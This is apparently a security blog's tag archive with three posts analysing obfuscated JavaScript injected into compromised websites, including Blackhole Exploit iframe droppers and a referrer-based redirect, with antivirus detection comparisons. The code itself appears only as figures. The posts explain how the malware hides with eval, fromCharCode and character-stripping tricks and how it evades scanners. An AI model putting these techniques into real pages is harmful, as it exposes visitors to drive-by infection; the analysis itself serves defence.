Tag Archive: eval


The VaNcZwAmM Variant

This interesting topic on the avast forums I just had to examine. Check out the Sucuri results; I’ve never seen that before! =O

I sent the URL to Quttera. Check out the results. Ok, lets pick one of the URLs. I picked GET /forum/forumdisplay.php?fid=124. Look what I found just below the ending HTML tag:

We can beautify the following code as follows:

By looking at the first line, we can instantly see v%@a~@@#r, and because we see a function with the string.replace() containing a regular expression, we can determine that symbols such as above will be omitted in the return. If you look at the code on lines 29 and 30, you can make out .appendChild(o). This is the fully deobfuscated content:

Of course you want to see the VirusTotal results ;)

Original (As seen in Figure 2) | Deobfuscated (As seen in Figure 3)

Notice that each scan gives different antivirus findings. The original obfuscated content being detected by Avast! (JS:Iframe-EQ [Trj]) and Kaspersky (HEUR:Trojan-Downloader.Script.Generic), while the deobfuscated content being detected by Commtouch (JS/IFrame.GN.gen), F-Prot (JS/IFrame.GN.gen), and K7AntiVirus (Riskware). A fail for the antivirus community, I must say.

 

Since the most used variable is VaNcZwAmM, I will call this the VaNcZwAmM variant,
~!Donovan

Found to infect another site with the Blackhole Exploit, a user reported this issue on the avast! forums. Confirmed with urlQuery and Sucuri, researching the blackhole site: Google says it has infected over 23 sites while Sucuri says it’s been used for redirection.

So, just how many scanners will detect this (Besides urlQuery and Sucuri of course)?

Interesting,
~!Donovan

Blackhole Exploit Please Wait Page

Blackhole Exploit Please Wait Page

 

Today, Polonus reported 2 Blackhole exploit sites here. Lets examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, only to fail, thus the fallback to catch occurs. We see the general zxc for the catch statement that lots of Blackhole variants use. Define n as an array of numbers, then loop through it to add onto s with the fromCharCode() function. Then 2 if statements that will 99.9% return tells the browser to do the s string as javascript code (using eval).

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1, except a few differences. Variant 2 trys to define a variable as eval prototype. The second if featured in Variant 1 is also not present.

Both of these scripts deobfuscate to a iframer to a blackhole exploit hotspot. Both of these files are mail.htm. Searching on CleanMX reveals that there are others out there. Here is an example VirusTotal result. Only 2 detect.

Be prepared,
~!Donovan

Billion Homepage

Originally found by avast! antivirus, a regular user reported the problem on the avast! forums here.

Yesterday, urlQuery reported 2 evals. The first one is the important one, so lets start there. CleanMX has the evidence in hex.

Billion Exploit In Hex

Which deobfuscates to something like this:
Billion Exploit Base 1 Decoded

That deobfuscates to this:

Billion Exploit Base 2 Decoded

That can be simplified like this:
Billion Exploit Base 3 DecodedNow that we got a good, clean image of the malware at hand, we see that it checks the document referrer, or how the site got to this site. If from a major search engine, create a cookie and redirect the user. Scanning the url at VirusTotal returns nothing, however URLVoid has issues. This also gives us information that sites with the IP of 66.199.231.59 should be considered suspicious.

The site is now under maintenance to remove the malicious content. Should update their Apache software, as latest is 2.4.2 while they use 1.3.37.

Keep your software up to date,
~!Donovan